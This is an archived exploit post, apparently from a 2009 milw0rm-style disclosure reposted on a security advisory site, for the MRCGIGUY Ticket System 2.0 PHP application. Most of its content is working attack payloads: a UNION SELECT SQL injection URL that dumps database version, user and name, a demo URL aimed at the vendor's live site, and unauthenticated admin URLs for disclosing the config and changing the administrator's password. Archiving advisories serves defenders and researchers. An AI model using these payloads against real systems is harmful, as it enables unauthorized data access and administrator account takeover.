MRCGIGUY The Ticket System 2.0 PHP Multiple Remote Vulnerabilities

2009.06.18
Credit: ThE g0bL!N
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-2080 | CVE-2009-2639
CWE: CWE-264

MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities Founder: ThE g0bL!N ------ Home: http:/www.4ckx.com/dz/ ---- Vendor:http://www.mrcgiguy.com Special Thx: All Muslims All Members Of Team Algerien Of FootBall Note: Algerie 3-1 Egypt Exploit: ------ SQL INJECTION: ------------- http://wwww.victim.com/admin.php?action=viewticket&id=[ SQL CODE] [ SQL CODE]=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12-- Demo: ---- http://www.mrcgiguy.com/tts/admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12-- Note : The exploit Worked out of enter The Right information of admin :) 2) Config Information Disclousr: (out of cookies) -------------------------------------------------- go to url: --------- http://victim/tts/admin.php?action=editconfig Admin Change Password: *-------------------- http://victim.com/path/admin.php?action=editop&id=1

References:

http://xforce.iss.net/xforce/xfdb/51029
http://www.milw0rm.com/exploits/8917
http://secunia.com/advisories/35350


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top